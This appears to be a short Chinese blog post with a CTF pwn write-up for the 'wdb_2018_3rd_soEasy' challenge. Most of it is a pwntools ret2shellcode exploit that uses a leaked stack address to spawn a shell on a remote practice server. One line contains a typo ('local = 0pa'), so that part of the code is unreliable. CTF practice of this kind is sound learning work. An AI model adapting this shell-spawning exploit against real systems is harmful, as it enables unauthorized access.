CTF-pwn:老板,来几道简单pwn

wdb_2018_3rd_soEasy

保护全关


在栈上写入shellcode,然后ret2shellcode

from pwn import *

local = 0pa

binary = "./wdb_2018_3rd_soEasy"	
port = "26500"

if local == 1:
	p = process(binary)
else:
	p = remote("node3.buuoj.cn",port)

def dbg():
	context.log_level = 'debug'

context.terminal = ['tmux','splitw','-h']
context(arch = 'i386',os = 'linux')

p.recvuntil('Hei,give you a gift->')
leak_stack = int(p.recv(10),16)

shellcode = asm(shellcraft.sh())
payload = shellcode.ljust(0x48,'a')
payload += p32(0xdeadbeef) + p32(leak_stack)

p.recvuntil('what do you want to do?')
p.send(payload)

# gdb.attach(p)
p.interactive()

posted @ 2020-10-19 21:44  lemon想学二进制  阅读(225)  评论(0编辑  收藏  举报